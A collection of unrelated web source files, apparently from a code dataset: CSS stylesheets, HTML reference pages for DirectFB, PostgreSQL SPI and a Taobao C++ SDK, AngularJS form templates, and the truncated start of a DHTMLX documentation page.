.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .bundle-title {
text-transform: capitalize; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-title {
padding: 2px 0;
border-bottom: 1px solid #f2f3f5; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-title .method-verb {
color: #669900; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-title .method-path {
color: #333;
text-transform: none; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-title .method-auth {
color: #333;
float: right;
display: block;
background: url(../img/auth-req.png) no-repeat top left;
font-size: .6em;
padding: 3px 0 0 13px;
text-transform: none;
height: 12px;
margin: 0;
line-height: 1em; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-arguments .title,
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-request .request-title,
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-response .response-title,
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .implementations .implementations-title,
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-errors .title {
background: #0F3E72;
padding: 5px 5px;
color: white;
font-weight: bold;
border: 1px solid #f2f3f5;
font-size: 1.1em; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-arguments ul li,
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-request .request-url,
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-request .request-body,
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-response .response-body,
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .implementations .implementation-bundle .implementation,
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-errors .method-error {
border: 1px solid #f2f3f5;
padding: 5px 5px; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-arguments ul {
padding-left: 0px;
padding-right: 13px;
display: block; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-arguments ul li.method-argument {
padding-left: 5px;
padding-right: 5px;
display: table;
list-style: none;
list-style-image: none;
width: 100%; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-arguments ul li.method-argument .argument-title {
width: 42%;
display: table-cell; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-arguments ul li.method-argument .argument-title .argument-optional {
display: block;
color: #999;
font-style: italic; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-arguments ul li.method-argument .argument-description {
display: table-cell;
width: 58%; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-request .request-body,
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-response .response-body,
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-error .method-error-response {
background: #F2F3F5;
word-wrap: normal;
white-space: pre;
overflow: auto; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-error .method-error-detail .method-error-question h6 {
margin: 0; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .method-error .method-error-detail .method-error-description {
font-style: italic; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .implementations .implementation-bundle .implementation-bundle-language {
background: #F2F3F5;
padding: 5px;
margin: 0; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .implementations .implementation-bundle .implementation .implementation-name {
font-weight: bold;
margin: 0 0 .25em 0; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource .resource-method-bundle .resource-method .implementations .implementation-bundle .implementation .implementation-download {
font-weight: bold;
text-transform: uppercase;
margin: .25em 0; }
|
output/build/directfb-1.4.17/docs/html/IDirectFB_GetInputDevice.html | twobob/buildroot-kindle | <HTML>
<STYLE>
<!--
A{textdecoration:none}
-->
</STYLE>
<STYLE type="text/css">
A:link, A:visited, A:active { text-decoration: none; }
</STYLE>
<HEAD>
<TITLE>IDirectFB - GetInputDevice [DirectFB Reference Manual]</TITLE>
</HEAD>
<BODY bgcolor=#F8F4D8 link=#2369E0 vlink=#2369E0 text=#232323>
<TABLE width=100% bgcolor=#C0B090 border=0 cellspacing=0 cellpadding=5>
<TR><TD width=30%>
<A href="http://www.directfb.org"><IMG border=0 src="dfb_logo-alpha.png"></A>
</TD><TD align=right>
<A href="index.html"><FONT size=+3 color=#203040>Reference Manual - 1.4.17</FONT></A>
</TD></TR>
<TR><TD colspan=2 align=center bgcolor=#284460>
<TABLE border=0 cellspacing=0 cellpadding=0>
<TR><TD nowrap align=right width=50%>
<BIG><FONT color=#D0D0D0><A href="IDirectFB.html"> <FONT color=#D0D0D0>IDirectFB</FONT></A> </FONT></BIG>
</TD><TD nowrap align=left width=50%>
<BIG><FONT color=#E09040> GetInputDevice</FONT></BIG>
</TD></TR>
</TABLE>
</TD></TR>
</TABLE>
<H4>
Retrieve an interface to a specific input device.
</H4>
<TABLE border=0 cellspacing=4 cellpadding=2 bgcolor=#F8F8F0>
<TR><TD colspan=5><I><FONT color=#425469><A href="types.html#DFBResult">DFBResult</A> <b>GetInputDevice (</b></FONT></I></TD></TR>
<TR><TD width=50>
</TD><TD valign=top>
<A href="IDirectFB.html">IDirectFB</A>
</TD><TD width=20> </TD><TD align=right>
<FONT color=#424242><B>*</B></FONT>
</TD><TD valign=top>
<FONT color=#234269><B>thiz,</B></FONT>
</TD></TR>
<TR><TD width=50>
</TD><TD valign=top>
DFBInputDeviceID
</TD><TD width=20> </TD><TD align=right>
<FONT color=#424242><B></B></FONT>
</TD><TD valign=top>
<FONT color=#234269><B>device_id,</B></FONT>
</TD></TR>
<TR><TD width=50>
</TD><TD valign=top>
<A href="IDirectFBInputDevice.html">IDirectFBInputDevice</A>
</TD><TD width=20> </TD><TD align=right>
<FONT color=#424242><B>**</B></FONT>
</TD><TD valign=top>
<FONT color=#234269><B>ret_interface</B></FONT>
</TD></TR>
<TR><TD colspan=5><I><FONT color=#425469><b>);</b></FONT></I></TD></TR>
</TABLE>
</P>
<P>
</P>
<TABLE width=100% bgcolor=#E0E8F0 border=0 cellspacing=1 cellpadding=3>
<TR><TD width=100>
<a rel="license" href="http://creativecommons.org/licenses/by-sa/3.0/"> <img alt="Creative Commons License" style="border-width:0" border="0" src="http://i.creativecommons.org/l/by-sa/3.0/88x31.png" /> </a> </TD><TD>
This work is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-sa/3.0/"> Creative Commons Attribution-Share Alike 3.0 License</a> </TD></TR>
</TABLE>
</BODY>
</HTML>
|
tpl/custom/tabs/bg.html | aliyun-UED/open5 | <div>
<div class="tab-block clearfix" style="margin-bottom:7px">
<div class="form-group clearfix" style="margin-bottom:0;">
<label class="col-sm-4 control-label">背景颜色</label>
<div class="col-sm-8" style="padding-left:0;">
<div class="colorpicker-container" input-colorpicker ng-model="css.color"></div>
</div>
</div>
</div>
<div class="tab-block clearfix" style="margin-bottom:7px">
<div class="form-group clearfix" style="margin-bottom:0">
<label class="col-sm-4 control-label">背景图片</label>
<div class="col-sm-8" style="padding-left:0;top:3px;position:relative;">
<button class="btn btn-primary btn-custom" ng-click="replace();">替换</button>
<button class="btn btn-default btn-custom" style="margin-left:3px;" ng-click="crop();">剪裁</button>
<button class="btn btn-default btn-custom" style="margin-left:2px;" ng-click="clearBg();">清除</button>
</div>
</div>
</div>
<div class="tab-block clearfix" style="margin-bottom:7px">
<div class="form-group clearfix" style="margin-bottom:0">
<label class="col-sm-4 control-label">背景效果</label>
<div class="col-sm-8" style="padding-left:0;top:3px;position:relative;">
<div class="btn-group" role="group">
<button type="button" class="btn btn-3 btn-border btn-custom " ng-class="{'active': effect.name == 'none'}" ng-click="setEffect('none')">无</button>
<button type="button" class="btn btn-3 btn-border btn-custom" ng-class="{'active': effect.name == 'stretch'}" ng-click="setEffect('stretch')">伸缩</button>
<button type="button" class="btn btn-3 btn-border btn-custom" ng-class="{'active': effect.name == 'slide'}" ng-click="setEffect('slide')">滑动</button>
</div>
</div>
</div>
</div>
<div class="tab-block clearfix" style="margin-bottom:7px" ng-show="effect.name == 'stretch'">
<div class="form-group clearfix" style="margin-bottom:0">
<label class="col-sm-4 control-label">运动方式</label>
<div class="col-sm-8" style="padding-left:0;top:3px;position:relative;">
<div class="btn-group" role="group">
<button type="button" class="btn btn-3 btn-border btn-custom" ng-class="{'active': effect.mode == 'origin'}" ng-click="setEffectMode('origin')">原地</button>
<button type="button" class="btn btn-3 btn-border btn-custom" ng-class="{'active': effect.mode == 'horizontal'}" ng-click="setEffectMode('horizontal')">水平</button>
<button type="button" class="btn btn-3 btn-border btn-custom" ng-class="{'active': effect.mode == 'vertical'}" ng-click="setEffectMode('vertical')">垂直</button>
</div>
</div>
</div>
</div>
<div class="tab-block clearfix" style="margin-bottom:7px" ng-show="effect.name == 'slide'">
<div class="form-group clearfix" style="margin-bottom:0">
<label class="col-sm-4 control-label">运动方式</label>
<div class="col-sm-8" style="padding-left:0;top:3px;position:relative;">
<div class="btn-group" role="group">
<button type="button" class="btn btn-3 btn-border btn-custom" ng-class="{'active': effect.mode == 'horizontal'}" ng-click="setEffectMode('horizontal')">水平</button>
<button type="button" class="btn btn-3 btn-border btn-custom" ng-class="{'active': effect.mode == 'vertical'}" ng-click="setEffectMode('vertical')">垂直</button>
</div>
</div>
</div>
</div>
<hr>
<div class="tab-block clearfix" >
<div class="form-group clearfix" style="margin-bottom:0;">
<label class="col-sm-4 control-label">页面名称</label>
<div class="col-sm-8" style="padding-left:0;">
<input class="form-control" placeholder="填写页面名称" ng-change="vm.onChange()" ng-model="vm.docProperties.name">
</div>
</div>
</div>
<hr>
<div class="tab-block clearfix">
<div class="form-group clearfix" style="margin-bottom:0">
<label class="col-sm-4 control-label">背景音乐</label>
<div class="col-sm-8" style="padding-left:0;top:3px;position:relative;">
<button class="btn btn-primary btn-custom" ui-sref="app.music.library">替换音乐</button>
<button class="btn btn-default btn-custom" style="margin-left:10px;" ng-click="removeMusic();">移除音乐</button>
</div>
</div>
<div class="tab-block-desc" ng-show="vm.music.url"><span>当前音乐: </span><span>{{vm.music.name || '未命名'}}</span></div>
</div>
<hr>
<div class="tab-block clearfix">
<div class="form-group clearfix" style="margin-bottom:0">
<label class="col-sm-4 control-label">翻页效果</label>
<div class="col-sm-8" style="padding-left:0">
<select class="form-control"
style="border:1px solid #C9C9C9;"
ng-model="docProperties.turnType"
ng-change=""
ng-options="transition.value as transition.label for transition in vm.pageTransition">
</select>
</div>
</div>
</div>
<!-- <div class="tab-block clearfix">
<div class="form-group clearfix" style="margin-bottom:0">
<label class="col-sm-4 control-label">翻页图标</label>
<div class="col-sm-8 clearfix" style="padding-left:0">
<div class="btn-group pull-right" choice ng-model="vm.page.turnIcon" data-default="no">
<button type="button" class="btn btn-default btn-custom" data-value="yes">是</button>
<button type="button" class="btn btn-default btn-custom" data-value="no">否</button>
</div>
</div>
</div>
</div> -->
</div> |
TOURUP/css/main.css | UconnNathanCarr/TOURUP1 | html {
height: 100%;
}
body {
background: #066765;
padding: 0;
text-align: center;
font-family: 'open sans';
position: relative;
margin: 0;
height: 100%;
}
.wrapper {
height: auto !important;
height: 100%;
margin: 0 auto;
overflow: hidden;
}
a {
text-decoration: none;
}
h1, h2 {
width: 100%;
float: center;
}
h1 {
margin-top: 90%;
opacity: 50%;
color: #fff;
text-shadow: 0 1px 5px rgba(0,0,0,0.5);
margin-bottom: 5px;
font-size: 1em;
letter-spacing: normal;
}
h2 {
color: #fff;
font-weight: 100;
text-shadow: 0 1px 5px rgba(0,0,0,0.5);
margin-top: 0;
margin-bottom: 10px;
}
.pointer {
color: #9b59b6;
font-family: 'Pacifico', cursive;
font-size: 30px;
margin-top: 15px;
}
pre {
margin: 80px auto;
}
pre code {
padding: 35px;
border-radius: 5px;
font-size: 15px;
background: rgba(0,0,0,0.1);
border: rgba(0,0,0,0.05) 5px solid;
max-width: 500px;
}
.main {
float: left;
width: 100%;
margin: 0 auto;
}
.main h1 {
padding:20px 50px;
float: left;
width: 10%;
font-size: 60px;
box-sizing: border-box;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
font-weight: 100;
margin: 0;
padding-top: 25px;
font-family: 'Playfair Display';
letter-spacing: -1px;
}
.main h1.demo1 {
background: #1ABC9C;
}
.reload.bell {
font-size: 12px;
padding: 20px;
width: 45px;
text-align: center;
height: 47px;
border-radius: 50px;
-webkit-border-radius: 50px;
-moz-border-radius: 50px;
}
.reload.bell #notification {
font-size: 25px;
line-height: 140%;
}
.reload, .btn{
display: inline-block;
border: 4px solid #A2261E;
border-radius: 5px;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
background: #CC3126;
display: inline-block;
line-height: 100%;
padding: 0.7em;
text-decoration: none;
color: #fff;
width: 100px;
line-height: 140%;
font-size: 17px;
font-family: open sans;
font-weight: bold;
}
.reload:hover{
background: #A2261E;
}
.btn {
width: 400px;
color: #fff;
border: none;
margin-left: 10px;
background: #A2261E;
}
.clear {
width: auto;
}
.btn:hover, .btn:hover {
background: rgba(0,0,0,0.8);
}
.btns {
width: 410px;
margin: 50px auto;
}
.credit {
text-align: center;
color: #fff;
padding: 10px;
margin: 0 0 40px 0;
float: left;
width: 100%;
}
.credit a {
color: #ccc;
text-decoration: none;
font-weight: bold;
}
.back {
position: absolute;
top: 0;
left: 0;
text-align: center;
display: block;
padding: 7px;
width: 100%;
box-sizing: border-box;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
background: rgba(0, 0, 0, 0.65);
font-weight: bold;
font-size: 13px;
color: #fff;
-webkit-transition: all 200ms ease-out;
-moz-transition: all 200ms ease-out;
-o-transition: all 200ms ease-out;
transition: all 200ms ease-out;
}
.back:hover {
background: rgba(0, 0, 0, 0.85);
}
.fullpagenav > .fpn_li:hover > .fpn_wrap {
-webkit-transition: opacity 500ms ease-out;
-moz-transition: opacity 500ms ease-out;
-o-transition: opacity 500ms ease-out;
transition: opacity 500ms ease-out;
}
.fullpagenav .fpn_li{
border-left: 1px solid rgba(255,255,255,0.8);
overflow: hidden;
}
.fullpagenav .fpn_wrap {
position: relative;
overflow: hidden;
}
.fullpagenav .fpn_wrap .content{
position: absolute;
bottom: -80px;
padding: 20px;
text-align: center;
width: 100%;
top: auto;
box-sizing: border-box;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
text-shadow: 0 1px 2px rgba(0,0,0,0.5);
-webkit-transition: bottom 500ms ease-out;
-moz-transition: bottom 500ms ease-out;
-o-transition: bottom 500ms ease-out;
transition: bottom 500ms ease-out;
background: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, rgba(0, 0, 0, 0)), color-stop(90%, rgba(0, 0, 0, 0.69)));
background: -webkit-linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.69) 90%);
background: -moz-linear-gradient(transparent, rgba(0,0,0,0.69) 90%);
background: -o-linear-gradient(transparent, rgba(0,0,0,0.69) 90%);
background: linear-gradient(rgba(0, 0, 0, 0),rgba(0, 0, 0, 0.69) 90%);
}
.fullpagenav .fpn_wrap .content i{
background: rgba(255,255,255,0.25);
box-shadow: 0 1px 5px rgba(0,0,0,0.5);
-moz-box-shadow: 0 1px 5px rgba(0,0,0,0.5);
-webkit-box-shadow: 0 1px 5px rgba(0,0,0,0.5);
border-radius: 50px;
-moz-border-radius: 50px;
-webkit-border-radius: 50px;
padding: 20px;
line-height: 100%;
font-size: 30px;
}
.fullpagenav .fpn_li.active .fpn_wrap .content{
position: absolute;
bottom: 0;
}
.fullpagenav .fpn_wrap {
font-weight: bold;
color: rgba(255,255,255,0.75);
margin: 0;
text-align: center;
padding: 0;
font-size: 50px;
}
.content h1 p {
font-weight: bold;
color: rgba(255,255,255,0.75);
margin: 0;
text-align: left;
padding: 0;
font-size: 3px;
}
.fullpagenav .fpn_wrap .content h1 a{
color: rgba(255,255,255,0.75);
}
.fullpagenav .fpn_wrap > img{
max-height: 100%;
min-height: 850px;
width: 1010px;
position: absolute;
height: 100%;
top: 0;
left: 50%;
margin-left: -505px;
}
.fullpagenav .fpn_wrap.fpn_clicked > img{
height: auto;
}
|
wp-content/themes/somerandomdude-Frank/frank/stylesheets/css/footer.css | gabrielstuff/a-good-dad-preview | #page_bottom {
background: #5d504f; }
#page_footer {
text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.5);
padding-top: 30px;
padding-bottom: 30px;
margin-top: 30px;
color: #f0eceb; }
#page_footer a {
color: #fffefe; }
#page_footer h3 {
font-size: 17px;
color: #f0eceb;
text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.7); }
|
hiphub/client/components/main/rightmenu/Status/StatusCategory/SelfTask/statusSelfTask.html | mukurpuri/parcota | <template name="statusSelfTask">
</template> |
_includes/footer.html | abhisheksarka/abhisheksarka.github.io | <footer class="footer-main">
{{ site.name }} © {{ site.time | date: '%Y' }} <a class="link" href="{{ site.url }}/feed.xml" target="_blank"><svg class="icon icon-rss"><use xlink:href="#icon-rss"></use></svg></a>
<!-- <p class="extra">
<a class="link" href="https://github.com/sergiokopplin/indigo">Indigo theme</a> by <a class="link" href="http://koppl.in">Kopplin</a>
</p> -->
</footer>
|
public/app/templates/caredfor-profile.html | nickolasnikolic/village | <section><a ui-sref="caredfor">back</a></section>
<section>
<form class="profileForm">
<fieldset>
<legend>Profile page</legend>
<label>name</label>
<input ng-model="submitProfile.name" name="name" type="text" placeholder="first and last name">
<label>phone</label>
<input ng-model="submitProfile.phone" name="phone" type=text placeholder="1(555)555-5555">
<span class="help-block">In an emergency, we will instigate a call to or from you. Otherwise, mum's the word.</span>
<label class="checkbox">
<input ng-model="submitProfile.neverCall" ng-init="submitFamily.neverCall=false" checked='checked' name="neverCall" type="checkbox">I want you never to do that. <span class="help-inline">You can say no now, then change your mind later.</span>
</label>
<hr />
<label>email</label>
<input ng-model="submitProfile.email" name="email" type="text" placeholder="valid email address">
<span class="help-block">All email addresses will be verified.</span>
<label>password</label>
<input ng-model="submitProfile.password" name="password" type="password">
<span class="help-block">Make it a great password that evil people can't guess. Memorize it.</span>
</fieldset>
<div>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
<button ng-click="joinFamily(submitFamily)" class="joinSubmit btn btn-primary" data-loading-text="Saving..." data-complete-text="Done">Save changes</button>
</div>
</form>
</section> |
www.jinbuguo.com/postgresql/menu823/spi-spi-gettypeid.html | Pengfei-Gao/develop-reference-data | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="zh-CN"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="Content-Language" content="zh-CN"><link href="stylesheet.css" media="all" rel="stylesheet" type="text/css">
<title>SPI_gettypeid</title>
<script>var _hmt=_hmt||[]; (function(){ var hm=document.createElement("script"); hm.src="//hm.baidu.com/hm.js?d286c55b63a3c54a1e43d10d4c203e75"; var s=document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm,s); })();</script>
</head><body class="REFENTRY">
<div>
<table summary="Header navigation table" width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><th colspan="5" align="center" valign="bottom">PostgreSQL 8.2.3 中文文档</th></tr>
<tr><td width="10%" align="left" valign="top"><a href="spi-spi-gettype.html" accesskey="P">后退</a></td><td width="10%" align="left" valign="top"><a href="spi-spi-gettype.html">快退</a></td><td width="60%" align="center" valign="bottom"></td><td width="10%" align="right" valign="top"><a href="spi-spi-getrelname.html">快进</a></td><td width="10%" align="right" valign="top"><a href="spi-spi-getrelname.html" accesskey="N">前进</a></td></tr>
</table>
<hr align="LEFT" width="100%"></div>
<h1><a name="SPI-SPI-GETTYPEID"></a>SPI_gettypeid</h1>
<div class="REFNAMEDIV"><a name="AEN43049"></a><h2>函数名</h2>SPI_gettypeid -- 返回声明字段的数据类型 OID</div>
<a name="AEN43053"></a>
<div class="REFSYNOPSISDIV"><a name="AEN43055"></a><h2>原型</h2>
<pre class="SYNOPSIS">Oid SPI_gettypeid(TupleDesc <tt class="PARAMETER">rowdesc</tt>, int <tt class="PARAMETER">colnumber</tt>)</pre>
</div>
<div class="REFSECT1"><a name="AEN43059"></a><h2>描述</h2>
<p><code class="FUNCTION">SPI_gettypeid</code> 返回声明字段的数据类型的 OID。</p>
</div>
<div class="REFSECT1"><a name="AEN43064"></a><h2>参数</h2>
<div class="VARIABLELIST">
<dl>
<dt><tt class="LITERAL">TupleDesc <tt class="PARAMETER">rowdesc</tt></tt></dt>
<dd><p>输入行描述</p></dd>
<dt><tt class="LITERAL">int <tt class="PARAMETER">colnumber</tt></tt></dt>
<dd><p>字段编号(从 1 开始记)</p></dd>
</dl>
</div>
</div>
<div class="REFSECT1"><a name="AEN43079"></a><h2>返回值</h2>
<p>声明字段的数据类型的 OID,或者错误时是 <tt class="SYMBOL">InvalidOid</tt> 。在出错的时候,<tt class="VARNAME">SPI_result</tt> 设置为 <tt class="SYMBOL">SPI_ERROR_NOATTRIBUTE</tt></p>
</div>
<div>
<hr align="LEFT" width="100%">
<table summary="Footer navigation table" width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><td width="33%" align="left" valign="top"><a href="spi-spi-gettype.html" accesskey="P">后退</a></td><td width="34%" align="center" valign="top"><a href="index.html" accesskey="H">首页</a></td><td width="33%" align="right" valign="top"><a href="spi-spi-getrelname.html" accesskey="N">前进</a></td></tr>
<tr><td width="33%" align="left" valign="top">SPI_gettype</td><td width="34%" align="center" valign="top"><a href="spi-interface-support.html" accesskey="U">上一级</a></td><td width="33%" align="right" valign="top">SPI_getrelname</td></tr>
</table>
</div>
</body></html> |
doc/InventoryQueryRequest_8h.html | sd44/TaobaoCppQtSDK | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.3.1"/>
<title>Taobao Cpp/Qt SDK: TaoApiCpp/request/InventoryQueryRequest.h File Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">Taobao Cpp/Qt SDK
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.3.1 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="annotated.html"><span>Classes</span></a></li>
<li class="current"><a href="files.html"><span>Files</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="files.html"><span>File List</span></a></li>
<li><a href="globals.html"><span>File Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark"> </span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark"> </span>Pages</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="dir_5ced2c06884fa9bf5c2da90298abd959.html">TaoApiCpp</a></li><li class="navelem"><a class="el" href="dir_1128517a525300e3048e72552ab6f4a6.html">request</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#nested-classes">Classes</a> </div>
<div class="headertitle">
<div class="title">InventoryQueryRequest.h File Reference</div> </div>
</div><!--header-->
<div class="contents">
<div class="textblock"><code>#include <<a class="el" href="TaoRequest_8h_source.html">TaoApiCpp/TaoRequest.h</a>></code><br/>
<code>#include <<a class="el" href="TaoParser_8h_source.html">TaoApiCpp/TaoParser.h</a>></code><br/>
<code>#include <<a class="el" href="InventoryQueryResponse_8h_source.html">TaoApiCpp/response/InventoryQueryResponse.h</a>></code><br/>
</div>
<p><a href="InventoryQueryRequest_8h_source.html">Go to the source code of this file.</a></p>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="nested-classes"></a>
Classes</h2></td></tr>
<tr class="memitem:"><td class="memItemLeft" align="right" valign="top">class  </td><td class="memItemRight" valign="bottom"><a class="el" href="classInventoryQueryRequest.html">InventoryQueryRequest</a></td></tr>
<tr class="separator:"><td class="memSeparator" colspan="2"> </td></tr>
</table>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Sun Apr 14 2013 16:25:37 for Taobao Cpp/Qt SDK by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.3.1
</small></address>
</body>
</html>
|
dhtmlx/docsExplorer/dhtmlxlayout/dhtmlxlayout___api_method_dhtmlxlayoutobject_geteffect.html | regadou/waw | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir="ltr">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" href="../codebase/default.css" type="text/css" media="screen" title="no title" charset="utf-8"><title>
dhtmlxlayout:api_method_dhtmlxlayoutobject_geteffect [DHX documentation]
</title></head>
<body>
<div class="dokuwiki">
<div class="stylehead">
<div class="header">
<a class="logo" href="http://dhtmlx.com" title="DHTMLX Home Page"></a>
<span class="tittle-dhtmlx">DHTMLX Docs & Samples Explorer</span>
<div class="search-field">
<form action="/dhtmlx/docs/doku.php" accept-charset="utf-8" id="dw__search"><div class="no"><input type="hidden" name="do" value="search" /><input type="text" id="qsearch__in" accesskey="f" name="id" title="Search" /><button type="submit"></button><div id="qsearch__out" class="ajax_qsearch JSpopup"></div></div></form> </div>
<div class="buttons">
<a class="doc"></a>
<a title="DHTMLX Samples homepage" href="../samples.html" class="sample"/></a>
</div>
<!-- <div class="pagename">
